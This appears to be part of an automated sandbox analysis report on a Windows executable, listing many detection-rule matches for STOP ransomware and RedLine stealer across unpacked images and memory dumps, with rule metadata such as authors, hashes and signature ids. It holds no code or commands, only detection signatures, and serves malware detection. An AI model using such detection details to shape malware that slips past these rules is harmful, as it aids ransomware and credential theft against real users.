Source: 7.2.bE5aaTiJM0.exe.42915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.bE5aaTiJM0.exe.42915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.bE5aaTiJM0.exe.42415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.bE5aaTiJM0.exe.42415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.bE5aaTiJM0.exe.43515a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.bE5aaTiJM0.exe.43515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.bE5aaTiJM0.exe.42915a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.bE5aaTiJM0.exe.42915a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.bE5aaTiJM0.exe.43515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.bE5aaTiJM0.exe.43515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.409352563.00000000027E4000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000000.440338861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000000.372461553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.402254205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000000.439811041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.429478962.00000000041D1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.448142800.00000000041B2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.445958712.00000000041A4000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.418527999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 4004, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 5720, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 5592, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 4376, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 3616, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 5828, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 5832, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 3920, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 3304, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: bE5aaTiJM0.exe PID: 2888, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: bE5aaTiJM0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
